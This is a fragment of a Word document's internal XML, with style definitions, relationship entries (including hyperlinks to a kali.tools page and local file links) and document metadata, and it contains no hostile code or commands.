    <w:name w:val="Style3"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00CB42F1"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing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character" w:customStyle="1" w:styleId="FontStyle17">
    <w:name w:val="Font Style17"/>
    <w:rsid w:val="00CB42F1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afd">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="afe"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CB42F1"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="283"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afe">
    <w:name w:val="Основной текст с отступом Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00CB42F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5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9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4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09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29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733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016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37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4732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0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file:///\\test2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microsoft.com/office/2018/08/relationships/commentsExtensible" Target="commentsExtensi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6/09/relationships/commentsIds" Target="commentsIds.xml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hyperlink" Target="https://kali.tools/?p=1679" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended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1.png"/><Relationship Id="rId69" Type="http://schemas.microsoft.com/office/2011/relationships/people" Target="peop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file:///\\test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kali.tools/?p=1679" TargetMode="External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2824</TotalTime>
  <Pages>32</Pages>
  <Words>2476</Words>
  <Characters>14114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Ruslan</cp:lastModifiedBy>
  <cp:revision>2701</cp:revision>
  <cp:lastPrinted>2019-05-27T01:42:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-07T19:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-09T11:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>